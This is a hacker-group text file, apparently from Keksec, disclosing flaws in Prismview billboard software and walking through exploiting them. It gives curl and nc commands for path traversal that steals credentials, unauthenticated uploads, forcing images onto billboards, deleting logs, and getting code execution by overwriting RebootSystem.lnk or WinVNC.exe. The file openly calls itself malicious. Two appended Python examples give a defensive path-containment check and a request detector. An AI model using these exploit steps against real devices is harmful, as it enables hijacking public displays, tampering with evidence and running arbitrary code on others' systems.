prismview.txt billboard software
[09-08-2019] KEK KOMMUNIKATIONS BRINGS YOU...

INNOVATORS IN KEK-BASED TEKNOLOGY
EXPERTS IN RESPONSIBLE DISCLOSURE
GENERAL ALL-AROUND COOL D00DZ

╔═══════════════╗
║ prismview.txt ║
╚═══════════════╝

  This file is presented for malicious purposes only. Keksec takes no
  responsibility for the use of the information in this file by
  shit-eating whitehats, or for the patching of any vulnerabilities
  disclosed in this file by butthurt SWEs.

Hello?... Are we still live?... Ah, there you are! Our faithful friend! Our fantastic follower!

We're very sorry for being gone for so long. Sadly, as with all things, we have waxed and waned in and out of existence. Heat has come and gone. Boxes, shells, and exploits too have seen the light of day only to be snuffed out by zealous whitehats. Somehow, despite the religious fervor of the whitehat, our billboard vulns haven't been killed. You shitters really dropped the ball. No, YESCO, telling customers to move boards behind a VPN is *not* a patch.

In this file we're dropping the deetz on YESCO's (and now Samsung's) Prismview billboard software.

Public Disclosure Timeline:
  Found:               maliciously
  Contacted vendor:    technically
  Disclosed publicly:  affirmatively

[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]

It should first be said that Prismview is a piece of software as well as a company. The company was owned by YESCO, under which it developed the initial Prismview software, and was then sold to Samsung.
The Prismview software is simply a C# HTTP server which runs on an embedded Windows installation. It handles scheduling for different images as well as diagnostics. These Windows installations also come standard with VNC, AV (usually McAfee or Kaspersky), and other basic software. Since developing that software, Prismview was sold to Samsung, and it would seem that they've transitioned to a model similar to Lamar's. We would like to take this time to remind Samsung, again, that shoving your shit behind a VPN does not make it secure.

[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]

In order to control a Prismview billboard, a client program is provided which implements calls to an HTTP API on the YESCO Prismview server (referred to as Prismview from now on). All of these operations occur within the Prismview install directory (%USERPROFILE%\Prismview Player), and all directories mentioned from now on are within that directory unless specified otherwise. Here we will go over some endpoints of interest:

/AMILOGGEDIN
    Responds with "OK" if the current IP is logged in or authentication is disabled. We would tell you which endpoints require authentication but, as seems to be the Prismview way, this varies between releases.

/PRISMVIEWLOGIN001
    Takes two headers, "User" and "Password", and checks whether they are equal to the configured values. If so, it adds the requesting IP to a list of logged-in users. Returns "OK Password" on success, or "OK Password - Not Applicable" if the password was correct but authentication is disabled.

/PREPAREFORSPLITFILE
    Clears the Joiner\ directory. Responds with "OK" on success.

/SPLITUPLOAD
    Takes a multipart octet stream and saves it, under the file name specified in the multipart, within the Joiner\ directory. Responds "File Uploaded." on success.
/SPLITJOIN
    Reads the file at Joiner\SplitterInfo.xml, which has the format

        <FileSplitterJoinerInfoPacket>
          <OutputPathAndNameUnicoded>../path :^)</OutputPathAndNameUnicoded>
          <NumberOfFiles>1337</NumberOfFiles>
          <LastWriteTime>2011-11-11T11:11:11</LastWriteTime>
        </FileSplitterJoinerInfoPacket>

    If NumberOfFiles is 3, for example, it will concatenate XferFile.0, XferFile.1, and XferFile.2. It will then write the result of this concatenation to OutputPathAndNameUnicoded within the XFER directory. Doesn't sanitize OutputPathAndNameUnicoded. Responds "OK" on success.

/REBOOTSYSTEM
    Runs the RebootSystem.lnk file in the Prismview directory.

/RESTARTPLAYER
    Runs the RestartPlayer.lnk file in the Prismview directory.

/RESTARTVNC
    Kills all processes with the name "WinVNC" and tries to run the following programs, in order, with the single argument "-run":

        C:\Program Files\UltraVNC\WinVNC.exe
        TightVNC-unstable\WinVNC.exe
        TightVNC\WinVNC.exe
        VNC\WinVNC.exe

/UPLOAD
    Takes a multipart octet stream and the file name, creation year, month, day, hour, minute, second, and another option which is simply left as "NA", as comma-separated values in the HTTP header "prismxfer001". An example is given in the next section.

/UPLOAD2
    Takes a multipart octet stream and the following HTTP headers:

        PrismXfer-DestName (base64-encoded upload path)
        PrismXfer-FileLength
        PrismXfer-FileLastWriteTimeUTC
        PrismXfer-MD5Checksum

    Writes the file to XFER\. Doesn't sanitize DestName.

/VIEWSCREEN.JPG and/or /VIEWSCREENALL.JPG
    Returns a JPEG screen capture of the running server.

/PV9COMMAND
    Only has to start with /PV9COMMAND. The request path is then split on the character '|' and handling continues only if the resulting array has more than one entry. The first entry in this resulting array is used as the command, and the rest are arguments. For example, if you request the path "/PV9COMMAND|INSTANTPLAY1|image.jpg|99", it runs the INSTANTPLAY1 command with arguments "image.jpg" and "99".
    Some commands offered are as follows:

    INSTANTPLAY1|{PATH}|{REPEATS}
        Plays the image at OperatingMedia/{PATH} REPEATS times on whatever is attached to the Prismview server. Doesn't sanitize PATH.

    INSTANTPLAY2|{PATH}|{REPEATS}
        The same as INSTANTPLAY1, except that if there is a file at XFER/Media it will copy that file into OperatingMedia prior to playing it.

    DELETEFILE1|{PATH}
        Deletes the file at XFER\{PATH}. Doesn't sanitize PATH.

    CREATEFOLDER|{PATH}
        Creates a directory at XFER\{PATH}. Again, doesn't sanitize PATH.

/../PrismviewV9-Player-006.xml
    O-oh. If the Prismview server can't find an endpoint to handle a request with, it searches OperatingMedia/ for the requested file. It doesn't check for LFI and is very stupid. That XML file contains the username and password required to authenticate with the Prismview server.

It should also be remembered that the Prismview team was immensely disorganized in creating the Prismview software. Depending on the version, any number of these endpoints will actually exist. Thankfully, the Prismview executable is usually in the same place across versions. You can simply use the LFI to download the executable and open it in your favorite C# decompiler. The most obviously broken code is in the UserControlWebServer class or one named similarly. There are far more endpoints of course, but we feel this will give you at least some idea of the workings of Prismview.

[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]

Now we will walk you through how a master hacker like yourself might go about finding and exploiting these billboards. Prismview uses the WeOnlyDo C# webserver API, so some early versions use that as their HTTP Server header. Later versions simply use some variation of "Prismview Player". Shodan searches will bring back a few but not many. More can be found with more comprehensive scans of business or 4G IP ranges. You can then find out whether authentication is enabled or not by requesting /AMILOGGEDIN.
  # If authentication is disabled you will see something like this
  $ curl http://LAME/AMILOGGEDIN
  OK

  # If it is enabled, you will see this
  $ curl http://LAME/AMILOGGEDIN
  Failed

If you see "Failed", don't worry. We can simply use our handy dandy LFI to obtain the Username and Password properties of the configuration file.

  # Note that the name of this file and possibly its location vary per
  # release. We leave figuring this out as an exercise for the reader :^)
  $ echo -e 'GET /../PrismviewV9-Player-006.xml HTTP/1.0\r\n' \
      | nc LAME 80
  ...
  <UserName>bkrebs</UserName>
  <Password>god</Password
  ...

You can then authenticate with the server

  $ curl -H'User: bkrebs' -H'Password: god' http://LAME/PRISMVIEWLOGIN001
  OK Password

And use one of the many methods available to upload your image

  $ mv image.jpg XferFile.0
  $ curl -F file=@XferFile.0 http://LAME/SPLITUPLOAD
  File uploaded.
  $ echo 'PEZpbGVTcGxpdHRlckpvaW5lckluZm9QYWNrZXQ+CiAgPE91dHB1dFBhdGhB'\
         'bmROYW1lVW5pY29kZWQ+Li4vcGF0aCA6Xik8L091dHB1dFBhdGhBbmROYW1l'\
         'VW5pY29kZWQ+CiAgPE51bWJlck9mRmlsZXM+MTMzNzwvTnVtYmVyT2ZGaWxl'\
         'cz4KICA8TGFzdFdyaXRlVGltZT4yMDExLTExLTExVDExOjExOjExPC9MYXN0'\
         'V3JpdGVUaW1lPgo8L0ZpbGVTcGxpdHRlckpvaW5lckluZm9QYWNrZXQ+Cgo='\
      | base64 --decode > SplitterInfo.xml
  $ curl -F file=@SplitterInfo.xml http://LAME/SPLITUPLOAD
  File uploaded.
  $ curl http://LAME/SPLITJOIN
  OK

or

  $ curl -F file=@image.jpg -H'prismxfer001: 2011,11,11,11,11,11,NA' \
      http://LAME/UPLOAD

or

  $ curl -F file=@image.jpg \
      -H'PrismXfer-DestName: SEFLS0EgSEFLS0EgSEFLS0E=' \
      -H'PrismXfer-FileLength: 632094' \
      -H'PrismXfer-FileLastWriteTimeUTC: 2015-03-03-T00:00:00' \
      -H'PrismXfer-MD5Checksum: 07094d279ef4502e07477fa58631113b' \
      http://LAME/UPLOAD2

etc.

Depending on where you uploaded your image to, there are several ways to play it. The laziest would be to refresh the home page and wait until an image is playing with the same file extension as the one you wish to put up.
Then you can simply upload your image over that file and it will play the next time the schedule loops around. If you can't find an image with the same extension, just upload the image file to OperatingMedia\ and play it using INSTANTPLAY1.

  $ curl 'http://LAME/PV9COMMAND|INSTANTPLAY1'\
         '|image.jpg'\
         '|999999'
  OK

If you're lazy you're done here. If not, you probably want to at least unlink the logs.

  $ curl 'http://LAME/GETLISTLOGDIRECTORY'
  ...
  SystemLog-06-08-37.lg    344    6/8/1337 12:00 AM
  SystemLog-06-08-37.lg    344    6/9/1337 12:00 AM
  SystemLog-06-08-37.lg    344    6/10/1337 12:00 AM
  SystemLog-06-08-37.lg    344    6/11/1337 12:00 AM
  ...
  $ curl 'http://LAME/PV9COMMAND|DELETEFILE1|Log\SystemLog-06-08-37.lg'
  OK

Getting code execution is fairly easy as well. Just upload a file to overwrite RebootSystem.lnk in the Prismview directory or any of the WinVNC.exes and then request /REBOOTSYSTEM or /RESTARTVNC to execute it.

[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]

In conclusion, fuck YESCO, fuck Samsung, and fuck Prismview.

GLHF <3 keksec
[@le_keksec]
[le_keksec@protonmail.com]

[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]

greets to thugcrowd and conflict ;-*
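Every "doesn't sanitize" above (OutputPathAndNameUnicoded in /SPLITJOIN, DestName in /UPLOAD2, PATH in DELETEFILE1 and CREATEFOLDER) is the same missing check: the server joins a caller-supplied name onto XFER\ and never confirms the result stays inside it. The following is an added example, not Keksec's code and not Prismview's, showing the SplitterInfo.xml format from this file parsed two ways: the join as the text describes it, and a containment check that rejects it. The XFER directory is assumed to be ./XFER relative to the working directory, and the XML is constructed from the sample above.

```python
import os
import xml.etree.ElementTree as ET

# Constructed SplitterInfo.xml in the format the file describes; the
# OutputPathAndNameUnicoded value is the traversal sample from the text.
SPLITTER_INFO = """<FileSplitterJoinerInfoPacket>
  <OutputPathAndNameUnicoded>../path :^)</OutputPathAndNameUnicoded>
  <NumberOfFiles>3</NumberOfFiles>
  <LastWriteTime>2011-11-11T11:11:11</LastWriteTime>
</FileSplitterJoinerInfoPacket>"""

# Assumed: the player's XFER\ directory, resolved relative to the cwd here.
XFER_DIR = os.path.realpath("XFER")


def parse_splitter_info(info_xml):
    """Return (output_name, part_names) from a SplitterInfo.xml document."""
    root = ET.fromstring(info_xml)
    name = root.findtext("OutputPathAndNameUnicoded") or ""
    count = int(root.findtext("NumberOfFiles") or "0")
    return name, [f"XferFile.{i}" for i in range(count)]


def unsafe_join_target(info_xml):
    """What the text describes: the name is joined as given, so '..' leaves XFER."""
    name, _ = parse_splitter_info(info_xml)
    return os.path.normpath(os.path.join(XFER_DIR, name))


def safe_join_target(info_xml):
    """Hardened form: refuse empty, absolute, drive-letter or backslash names,
    then require the resolved path to stay under XFER. Raises ValueError."""
    name, parts = parse_splitter_info(info_xml)
    if not name or not parts or os.path.isabs(name) or "\\" in name or ":" in name:
        raise ValueError(f"rejected output name {name!r}")
    target = os.path.realpath(os.path.join(XFER_DIR, name))
    if os.path.commonpath([XFER_DIR, target]) != XFER_DIR:
        raise ValueError(f"{name!r} resolves outside XFER: {target}")
    return target


def accepts(info_xml):
    """True if safe_join_target would accept this SplitterInfo.xml."""
    try:
        safe_join_target(info_xml)
        return True
    except ValueError:
        return False
```

The same containment check applies unchanged to the base64-decoded DestName of /UPLOAD2 and to the PATH argument of DELETEFILE1 and CREATEFOLDER.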
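For anyone who has one of these players on a network they monitor, the walkthrough above translates directly into request patterns worth alerting on. This is an added example, not part of the original file: detection logic over constructed request records (assumed shape: a request path plus a header dict, as a proxy or capture in front of the player would yield) that flags the traversal in the request path, the unsanitized PV9COMMAND arguments, a decoded PrismXfer-DestName that leaves XFER or names an executable, log deletion via DELETEFILE1, and hits on the endpoints that launch a .lnk or WinVNC.exe.

```python
import base64
import re

# Constructed request records (path plus header dict); not real traffic.
REQUESTS = [
    {"path": "/AMILOGGEDIN", "headers": {}},
    {"path": "/../PrismviewV9-Player-006.xml", "headers": {}},
    {"path": "/PRISMVIEWLOGIN001", "headers": {"User": "u", "Password": "p"}},
    {"path": "/UPLOAD2", "headers": {
        "PrismXfer-DestName": base64.b64encode(b"..\\RebootSystem.lnk").decode()}},
    {"path": "/PV9COMMAND|DELETEFILE1|Log\\SystemLog-06-08-37.lg", "headers": {}},
    {"path": "/PV9COMMAND|INSTANTPLAY1|spot.jpg|3", "headers": {}},
    {"path": "/REBOOTSYSTEM", "headers": {}},
]

# A '..' segment bounded by slash, backslash, or either end of the string.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def classify(req):
    """Return the alerts one request raises; an empty list means nothing notable."""
    path = req["path"]
    hdrs = {k.lower(): v for k, v in req["headers"].items()}
    alerts = []
    if TRAVERSAL.search(path):
        alerts.append("traversal in path: OperatingMedia fallback serves arbitrary files")
    if path.upper().startswith("/PV9COMMAND"):
        parts = path.split("|")
        cmd, args = (parts[1].upper() if len(parts) > 1 else ""), parts[2:]
        if cmd in ("DELETEFILE1", "CREATEFOLDER") and any(TRAVERSAL.search(a) for a in args):
            alerts.append(f"{cmd} argument escapes XFER")
        if cmd == "DELETEFILE1" and args and args[0].lower().startswith("log"):
            alerts.append("DELETEFILE1 against a player log (anti-forensics)")
    dest = hdrs.get("prismxfer-destname")
    if dest is not None:
        try:
            decoded = base64.b64decode(dest, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError; treat as empty
            decoded = ""
        if TRAVERSAL.search(decoded) or decoded.lower().endswith((".lnk", ".exe")):
            alerts.append(f"UPLOAD2 destination escapes XFER or is executable: {decoded!r}")
    if path.upper() in ("/REBOOTSYSTEM", "/RESTARTVNC", "/RESTARTPLAYER"):
        alerts.append("launch endpoint hit; correlate with an earlier upload")
    return alerts


def triage(requests):
    """Map each flagged request path to its alerts, dropping requests with none."""
    return {r["path"]: a for r in requests if (a := classify(r))}
```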